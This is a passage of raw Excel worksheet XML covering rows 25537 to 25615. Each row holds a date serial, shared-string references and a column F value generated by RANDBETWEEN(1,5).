      </c>
      <c r="F25537">
        <f t="shared" ca="1" si="398"/>
        <v>5</v>
      </c>
    </row>
    <row r="25538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25538" s="1">
        <v>42949.595601851855</v>
      </c>
      <c r="C25538" t="s">
        <v>10</v>
      </c>
      <c r="D25538" t="s">
        <v>39</v>
      </c>
      <c r="E25538" t="s">
        <v>23186</v>
      </c>
      <c r="F25538">
        <f t="shared" ref="F25538:F25601" ca="1" si="399">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="25539" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25539" s="1">
        <v>42949.589270833334</v>
      </c>
      <c r="C25539" t="s">
        <v>1130</v>
      </c>
      <c r="E25539" s="2" t="s">
        <v>23187</v>
      </c>
      <c r="F25539">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25540" s="1">
        <v>42949.565358796295</v>
      </c>
      <c r="C25540" t="s">
        <v>10</v>
      </c>
      <c r="D25540" t="s">
        <v>46</v>
      </c>
      <c r="E25540" t="s">
        <v>23188</v>
      </c>
      <c r="F25540">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25541" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25541" s="1">
        <v>42949.560393518521</v>
      </c>
      <c r="C25541" t="s">
        <v>10</v>
      </c>
      <c r="D25541" t="s">
        <v>6</v>
      </c>
      <c r="E25541" s="2" t="s">
        <v>23189</v>
      </c>
      <c r="F25541">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25542" s="1">
        <v>42949.550578703704</v>
      </c>
      <c r="C25542" t="s">
        <v>10</v>
      </c>
      <c r="D25542" t="s">
        <v>6</v>
      </c>
      <c r="F25542">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25543" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25543" s="1">
        <v>42949.509814814817</v>
      </c>
      <c r="C25543" t="s">
        <v>43</v>
      </c>
      <c r="E25543" s="2" t="s">
        <v>23190</v>
      </c>
      <c r="F25543">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25544" s="1">
        <v>42949.503391203703</v>
      </c>
      <c r="C25544" t="s">
        <v>10</v>
      </c>
      <c r="D25544" t="s">
        <v>151</v>
      </c>
      <c r="E25544" t="s">
        <v>23191</v>
      </c>
      <c r="F25544">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25545" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25545" s="1">
        <v>42949.480613425927</v>
      </c>
      <c r="C25545" t="s">
        <v>10</v>
      </c>
      <c r="D25545" t="s">
        <v>89</v>
      </c>
      <c r="E25545" s="2" t="s">
        <v>23192</v>
      </c>
      <c r="F25545">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25546" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25546" s="1">
        <v>42949.479004629633</v>
      </c>
      <c r="C25546" t="s">
        <v>10</v>
      </c>
      <c r="D25546" t="s">
        <v>112</v>
      </c>
      <c r="E25546" t="s">
        <v>23193</v>
      </c>
      <c r="F25546">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25547" s="1">
        <v>42949.473368055558</v>
      </c>
      <c r="C25547" t="s">
        <v>6</v>
      </c>
      <c r="D25547" t="s">
        <v>114</v>
      </c>
      <c r="E25547" t="s">
        <v>23194</v>
      </c>
      <c r="F25547">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25548" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25548" s="1">
        <v>42949.452256944445</v>
      </c>
      <c r="C25548" t="s">
        <v>41</v>
      </c>
      <c r="E25548" s="2" t="s">
        <v>23195</v>
      </c>
      <c r="F25548">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25549" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A25549" s="1">
        <v>42949.450138888889</v>
      </c>
      <c r="C25549" t="s">
        <v>6</v>
      </c>
      <c r="D25549" t="s">
        <v>25</v>
      </c>
      <c r="E25549" s="2" t="s">
        <v>23196</v>
      </c>
      <c r="F25549">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25550" s="1">
        <v>42949.449143518519</v>
      </c>
      <c r="C25550" t="s">
        <v>48</v>
      </c>
      <c r="E25550" t="s">
        <v>23197</v>
      </c>
      <c r="F25550">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25551" s="1">
        <v>42949.42396990741</v>
      </c>
      <c r="C25551" t="s">
        <v>10</v>
      </c>
      <c r="D25551" t="s">
        <v>41</v>
      </c>
      <c r="E25551" t="s">
        <v>23198</v>
      </c>
      <c r="F25551">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25552" s="1">
        <v>42949.419120370374</v>
      </c>
      <c r="C25552" t="s">
        <v>10</v>
      </c>
      <c r="D25552" t="s">
        <v>178</v>
      </c>
      <c r="E25552" t="s">
        <v>23199</v>
      </c>
      <c r="F25552">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25553" s="1">
        <v>42949.39570601852</v>
      </c>
      <c r="C25553" t="s">
        <v>10</v>
      </c>
      <c r="D25553" t="s">
        <v>178</v>
      </c>
      <c r="E25553" t="s">
        <v>23200</v>
      </c>
      <c r="F25553">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25554" s="1">
        <v>42949.345717592594</v>
      </c>
      <c r="C25554" t="s">
        <v>10</v>
      </c>
      <c r="D25554" t="s">
        <v>36</v>
      </c>
      <c r="E25554" t="s">
        <v>23201</v>
      </c>
      <c r="F25554">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25555" s="1">
        <v>42949.33934027778</v>
      </c>
      <c r="C25555" t="s">
        <v>10</v>
      </c>
      <c r="D25555" t="s">
        <v>271</v>
      </c>
      <c r="E25555" t="s">
        <v>23202</v>
      </c>
      <c r="F25555">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25556" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A25556" s="1">
        <v>42949.305868055555</v>
      </c>
      <c r="C25556" t="s">
        <v>559</v>
      </c>
      <c r="E25556" s="2" t="s">
        <v>23203</v>
      </c>
      <c r="F25556">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25557" s="1">
        <v>42949.273287037038</v>
      </c>
      <c r="C25557" t="s">
        <v>48</v>
      </c>
      <c r="E25557" t="s">
        <v>23204</v>
      </c>
      <c r="F25557">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25558" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25558" s="1">
        <v>42949.166134259256</v>
      </c>
      <c r="C25558" t="s">
        <v>41</v>
      </c>
      <c r="E25558" s="2" t="s">
        <v>23205</v>
      </c>
      <c r="F25558">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25559" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A25559" s="1">
        <v>42949.160787037035</v>
      </c>
      <c r="C25559" t="s">
        <v>71</v>
      </c>
      <c r="E25559" s="2" t="s">
        <v>23206</v>
      </c>
      <c r="F25559">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25560" s="1">
        <v>42949.144247685188</v>
      </c>
      <c r="C25560" t="s">
        <v>41</v>
      </c>
      <c r="E25560" t="s">
        <v>23207</v>
      </c>
      <c r="F25560">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25561" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25561" s="1">
        <v>42949.122615740744</v>
      </c>
      <c r="C25561" t="s">
        <v>559</v>
      </c>
      <c r="E25561" s="2" t="s">
        <v>23208</v>
      </c>
      <c r="F25561">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25562" s="1">
        <v>42948.887997685182</v>
      </c>
      <c r="C25562" t="s">
        <v>140</v>
      </c>
      <c r="D25562" t="s">
        <v>141</v>
      </c>
      <c r="E25562" t="s">
        <v>23209</v>
      </c>
      <c r="F25562">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25563" s="1">
        <v>42948.879224537035</v>
      </c>
      <c r="C25563" t="s">
        <v>140</v>
      </c>
      <c r="D25563" t="s">
        <v>141</v>
      </c>
      <c r="E25563" t="s">
        <v>23210</v>
      </c>
      <c r="F25563">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25564" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25564" s="1">
        <v>42948.836736111109</v>
      </c>
      <c r="C25564" t="s">
        <v>140</v>
      </c>
      <c r="D25564" t="s">
        <v>141</v>
      </c>
      <c r="E25564" s="2" t="s">
        <v>23211</v>
      </c>
      <c r="F25564">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25565" s="1">
        <v>42948.670578703706</v>
      </c>
      <c r="C25565" t="s">
        <v>10</v>
      </c>
      <c r="D25565" t="s">
        <v>23</v>
      </c>
      <c r="E25565" t="s">
        <v>23212</v>
      </c>
      <c r="F25565">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25566" s="1">
        <v>42948.653773148151</v>
      </c>
      <c r="C25566" t="s">
        <v>10</v>
      </c>
      <c r="D25566" t="s">
        <v>6</v>
      </c>
      <c r="E25566" t="s">
        <v>23213</v>
      </c>
      <c r="F25566">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25567" s="1">
        <v>42948.633599537039</v>
      </c>
      <c r="C25567" t="s">
        <v>10</v>
      </c>
      <c r="D25567" t="s">
        <v>23</v>
      </c>
      <c r="E25567" t="s">
        <v>23214</v>
      </c>
      <c r="F25567">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25568" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25568" s="1">
        <v>42948.624930555554</v>
      </c>
      <c r="C25568" t="s">
        <v>10</v>
      </c>
      <c r="D25568" t="s">
        <v>17</v>
      </c>
      <c r="E25568" s="2" t="s">
        <v>23215</v>
      </c>
      <c r="F25568">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25569" s="1">
        <v>42948.562800925924</v>
      </c>
      <c r="C25569" t="s">
        <v>10</v>
      </c>
      <c r="D25569" t="s">
        <v>89</v>
      </c>
      <c r="E25569" t="s">
        <v>23216</v>
      </c>
      <c r="F25569">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25570" s="1">
        <v>42948.532893518517</v>
      </c>
      <c r="C25570" t="s">
        <v>10</v>
      </c>
      <c r="D25570" t="s">
        <v>23</v>
      </c>
      <c r="E25570" t="s">
        <v>23217</v>
      </c>
      <c r="F25570">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25571" s="1">
        <v>42948.530231481483</v>
      </c>
      <c r="C25571" t="s">
        <v>6</v>
      </c>
      <c r="D25571" t="s">
        <v>25</v>
      </c>
      <c r="E25571" t="s">
        <v>23218</v>
      </c>
      <c r="F25571">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25572" s="1">
        <v>42948.526296296295</v>
      </c>
      <c r="C25572" t="s">
        <v>10</v>
      </c>
      <c r="D25572" t="s">
        <v>89</v>
      </c>
      <c r="E25572" t="s">
        <v>23219</v>
      </c>
      <c r="F25572">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25573" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A25573" s="1">
        <v>42948.51357638889</v>
      </c>
      <c r="C25573" t="s">
        <v>10</v>
      </c>
      <c r="D25573" t="s">
        <v>89</v>
      </c>
      <c r="E25573" s="2" t="s">
        <v>23220</v>
      </c>
      <c r="F25573">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25574" s="1">
        <v>42948.499201388891</v>
      </c>
      <c r="C25574" t="s">
        <v>10</v>
      </c>
      <c r="D25574" t="s">
        <v>52</v>
      </c>
      <c r="E25574" t="s">
        <v>23221</v>
      </c>
      <c r="F25574">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25575" s="1">
        <v>42948.485023148147</v>
      </c>
      <c r="C25575" t="s">
        <v>41</v>
      </c>
      <c r="E25575" t="s">
        <v>23222</v>
      </c>
      <c r="F25575">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25576" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25576" s="1">
        <v>42948.471493055556</v>
      </c>
      <c r="C25576" t="s">
        <v>10</v>
      </c>
      <c r="D25576" t="s">
        <v>112</v>
      </c>
      <c r="E25576" s="2" t="s">
        <v>23223</v>
      </c>
      <c r="F25576">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25577" s="1">
        <v>42948.470613425925</v>
      </c>
      <c r="C25577" t="s">
        <v>41</v>
      </c>
      <c r="E25577" t="s">
        <v>23224</v>
      </c>
      <c r="F25577">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25578" s="1">
        <v>42948.468344907407</v>
      </c>
      <c r="C25578" t="s">
        <v>6</v>
      </c>
      <c r="D25578" t="s">
        <v>25</v>
      </c>
      <c r="E25578" t="s">
        <v>23225</v>
      </c>
      <c r="F25578">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25579" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25579" s="1">
        <v>42948.462685185186</v>
      </c>
      <c r="C25579" t="s">
        <v>731</v>
      </c>
      <c r="E25579" s="2" t="s">
        <v>23226</v>
      </c>
      <c r="F25579">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25580" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25580" s="1">
        <v>42948.450706018521</v>
      </c>
      <c r="C25580" t="s">
        <v>10</v>
      </c>
      <c r="D25580" t="s">
        <v>86</v>
      </c>
      <c r="E25580" s="2" t="s">
        <v>23227</v>
      </c>
      <c r="F25580">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25581" s="1">
        <v>42948.444328703707</v>
      </c>
      <c r="C25581" t="s">
        <v>71</v>
      </c>
      <c r="E25581" t="s">
        <v>23228</v>
      </c>
      <c r="F25581">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25582" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25582" s="1">
        <v>42948.442997685182</v>
      </c>
      <c r="C25582" t="s">
        <v>103</v>
      </c>
      <c r="E25582" s="2" t="s">
        <v>23229</v>
      </c>
      <c r="F25582">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25583" s="1">
        <v>42948.40662037037</v>
      </c>
      <c r="C25583" t="s">
        <v>318</v>
      </c>
      <c r="E25583" t="s">
        <v>23230</v>
      </c>
      <c r="F25583">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25584" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25584" s="1">
        <v>42948.405694444446</v>
      </c>
      <c r="C25584" t="s">
        <v>71</v>
      </c>
      <c r="E25584" s="2" t="s">
        <v>23231</v>
      </c>
      <c r="F25584">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25585" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25585" s="1">
        <v>42948.403460648151</v>
      </c>
      <c r="C25585" t="s">
        <v>10</v>
      </c>
      <c r="D25585" t="s">
        <v>89</v>
      </c>
      <c r="E25585" s="2" t="s">
        <v>23232</v>
      </c>
      <c r="F25585">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25586" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25586" s="1">
        <v>42948.39366898148</v>
      </c>
      <c r="C25586" t="s">
        <v>10</v>
      </c>
      <c r="D25586" t="s">
        <v>89</v>
      </c>
      <c r="E25586" s="2" t="s">
        <v>23233</v>
      </c>
      <c r="F25586">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25587" s="1">
        <v>42948.387569444443</v>
      </c>
      <c r="C25587" t="s">
        <v>124</v>
      </c>
      <c r="E25587" t="s">
        <v>23234</v>
      </c>
      <c r="F25587">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25588" s="1">
        <v>42948.35628472222</v>
      </c>
      <c r="C25588" t="s">
        <v>318</v>
      </c>
      <c r="F25588">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25589" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25589" s="1">
        <v>42948.336365740739</v>
      </c>
      <c r="C25589" t="s">
        <v>71</v>
      </c>
      <c r="E25589" s="2" t="s">
        <v>23235</v>
      </c>
      <c r="F25589">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25590" s="1">
        <v>42948.327361111114</v>
      </c>
      <c r="C25590" t="s">
        <v>339</v>
      </c>
      <c r="E25590" t="s">
        <v>23236</v>
      </c>
      <c r="F25590">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25591" s="1">
        <v>42948.30741898148</v>
      </c>
      <c r="C25591" t="s">
        <v>10</v>
      </c>
      <c r="D25591" t="s">
        <v>192</v>
      </c>
      <c r="E25591" t="s">
        <v>23237</v>
      </c>
      <c r="F25591">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25592" s="1">
        <v>42948.284155092595</v>
      </c>
      <c r="C25592" t="s">
        <v>301</v>
      </c>
      <c r="E25592" t="s">
        <v>23238</v>
      </c>
      <c r="F25592">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25593" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25593" s="1">
        <v>42948.217118055552</v>
      </c>
      <c r="C25593" t="s">
        <v>166</v>
      </c>
      <c r="E25593" s="2" t="s">
        <v>23239</v>
      </c>
      <c r="F25593">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25594" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A25594" s="1">
        <v>42948.205949074072</v>
      </c>
      <c r="C25594" t="s">
        <v>10</v>
      </c>
      <c r="D25594" t="s">
        <v>6</v>
      </c>
      <c r="E25594" s="2" t="s">
        <v>23240</v>
      </c>
      <c r="F25594">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25595" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25595" s="1">
        <v>42948.181111111109</v>
      </c>
      <c r="C25595" t="s">
        <v>319</v>
      </c>
      <c r="E25595" s="2" t="s">
        <v>23241</v>
      </c>
      <c r="F25595">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25596" s="1">
        <v>42948.170555555553</v>
      </c>
      <c r="C25596" t="s">
        <v>314</v>
      </c>
      <c r="E25596" t="s">
        <v>23242</v>
      </c>
      <c r="F25596">
        <f t="shared" ca="1" si="399"/>
        <v>4</v>
      </c>
    </row>
    <row r="25597" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A25597" s="1">
        <v>42948.144537037035</v>
      </c>
      <c r="C25597" t="s">
        <v>10</v>
      </c>
      <c r="D25597" t="s">
        <v>6</v>
      </c>
      <c r="E25597" s="2" t="s">
        <v>23167</v>
      </c>
      <c r="F25597">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25598" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25598" s="1">
        <v>42948.123993055553</v>
      </c>
      <c r="C25598" t="s">
        <v>69</v>
      </c>
      <c r="E25598" s="2" t="s">
        <v>23243</v>
      </c>
      <c r="F25598">
        <f t="shared" ca="1" si="399"/>
        <v>3</v>
      </c>
    </row>
    <row r="25599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25599" s="1">
        <v>42948.098553240743</v>
      </c>
      <c r="C25599" t="s">
        <v>41</v>
      </c>
      <c r="E25599" t="s">
        <v>23244</v>
      </c>
      <c r="F25599">
        <f t="shared" ca="1" si="399"/>
        <v>1</v>
      </c>
    </row>
    <row r="25600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25600" s="1">
        <v>42948.084756944445</v>
      </c>
      <c r="C25600" t="s">
        <v>319</v>
      </c>
      <c r="E25600" t="s">
        <v>23245</v>
      </c>
      <c r="F25600">
        <f t="shared" ca="1" si="399"/>
        <v>2</v>
      </c>
    </row>
    <row r="25601" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25601" s="1">
        <v>42948.007916666669</v>
      </c>
      <c r="C25601" t="s">
        <v>144</v>
      </c>
      <c r="E25601" s="2" t="s">
        <v>23246</v>
      </c>
      <c r="F25601">
        <f t="shared" ca="1" si="399"/>
        <v>5</v>
      </c>
    </row>
    <row r="25602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25602" s="1">
        <v>42947.989791666667</v>
      </c>
      <c r="C25602" t="s">
        <v>140</v>
      </c>
      <c r="D25602" t="s">
        <v>141</v>
      </c>
      <c r="E25602" t="s">
        <v>23247</v>
      </c>
      <c r="F25602">
        <f t="shared" ref="F25602:F25665" ca="1" si="400">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="25603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25603" s="1">
        <v>42947.979351851849</v>
      </c>
      <c r="C25603" t="s">
        <v>140</v>
      </c>
      <c r="D25603" t="s">
        <v>141</v>
      </c>
      <c r="E25603" t="s">
        <v>23248</v>
      </c>
      <c r="F25603">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
      </c>
    </row>
    <row r="25604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25604" s="1">
        <v>42947.907187500001</v>
      </c>
      <c r="C25604" t="s">
        <v>140</v>
      </c>
      <c r="D25604" t="s">
        <v>234</v>
      </c>
      <c r="E25604" t="s">
        <v>23249</v>
      </c>
      <c r="F25604">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
      </c>
    </row>
    <row r="25605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25605" s="1">
        <v>42947.738125000003</v>
      </c>
      <c r="C25605" t="s">
        <v>10</v>
      </c>
      <c r="D25605" t="s">
        <v>17</v>
      </c>
      <c r="E25605" t="s">
        <v>23250</v>
      </c>
      <c r="F25605">
        <f t="shared" ca="1" si="400"/>
        <v>3</v>
      </c>
    </row>
    <row r="25606" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A25606" s="1">
        <v>42947.721689814818</v>
      </c>
      <c r="C25606" t="s">
        <v>140</v>
      </c>
      <c r="D25606" t="s">
        <v>234</v>
      </c>
      <c r="E25606" s="2" t="s">
        <v>23251</v>
      </c>
      <c r="F25606">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
      </c>
    </row>
    <row r="25607" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A25607" s="1">
        <v>42947.716215277775</v>
      </c>
      <c r="C25607" t="s">
        <v>6</v>
      </c>
      <c r="D25607" t="s">
        <v>25</v>
      </c>
      <c r="E25607" s="2" t="s">
        <v>23252</v>
      </c>
      <c r="F25607">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
      </c>
    </row>
    <row r="25608" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25608" s="1">
        <v>42947.692060185182</v>
      </c>
      <c r="C25608" t="s">
        <v>10</v>
      </c>
      <c r="D25608" t="s">
        <v>89</v>
      </c>
      <c r="E25608" s="2" t="s">
        <v>23253</v>
      </c>
      <c r="F25608">
        <f t="shared" ca="1" si="400"/>
        <v>1</v>
      </c>
    </row>
    <row r="25609" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25609" s="1">
        <v>42947.681886574072</v>
      </c>
      <c r="C25609" t="s">
        <v>10</v>
      </c>
      <c r="D25609" t="s">
        <v>494</v>
      </c>
      <c r="E25609" s="2" t="s">
        <v>23254</v>
      </c>
      <c r="F25609">
        <f t="shared" ca="1" si="400"/>
        <v>4</v>
      </c>
    </row>
    <row r="25610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25610" s="1">
        <v>42947.676666666666</v>
      </c>
      <c r="C25610" t="s">
        <v>10</v>
      </c>
      <c r="D25610" t="s">
        <v>17</v>
      </c>
      <c r="E25610" t="s">
        <v>23255</v>
      </c>
      <c r="F25610">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
      </c>
    </row>
    <row r="25611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25611" s="1">
        <v>42947.676539351851</v>
      </c>
      <c r="C25611" t="s">
        <v>10</v>
      </c>
      <c r="D25611" t="s">
        <v>158</v>
      </c>
      <c r="E25611" t="s">
        <v>23256</v>
      </c>
      <c r="F25611">
        <f t="shared" ca="1" si="400"/>
        <v>2</v>
      </c>
    </row>
    <row r="25612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25612" s="1">
        <v>42947.674826388888</v>
      </c>
      <c r="C25612" t="s">
        <v>10</v>
      </c>
      <c r="D25612" t="s">
        <v>92</v>
      </c>
      <c r="E25612" t="s">
        <v>23257</v>
      </c>
      <c r="F25612">
        <f t="shared" ca="1" si="400"/>
        <v>2</v>
      </c>
    </row>
    <row r="25613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25613" s="1">
        <v>42947.669687499998</v>
      </c>
      <c r="C25613" t="s">
        <v>10</v>
      </c>
      <c r="D25613" t="s">
        <v>52</v>
      </c>
      <c r="E25613" t="s">
        <v>23258</v>
      </c>
      <c r="F25613">
        <f t="shared" ca="1" si="400"/>
        <v>1</v>
      </c>
    </row>
    <row r="25614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25614" s="1">
        <v>42947.666678240741</v>
      </c>
      <c r="C25614" t="s">
        <v>721</v>
      </c>
      <c r="E25614" t="s">
        <v>23259</v>
      </c>
      <c r="F25614">
        <f t="shared" ca="1" si="400"/>
        <v>2</v>
      </c>
    </row>
    <row r="25615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25615" s="1">
        <v>42947.664780092593</v>
      </c>
      <c r="C25615" t="s">
        <v>10</v>
      </c>
      <c r="D25615" t="s">
        <v>36</v>
      </c>
      <c r="E25615" t="s">
        <v>23260</v>
      </c>
      <c r="F25615">
        <f t="shared" ca="1" si="400"/>
        <v>5</v>
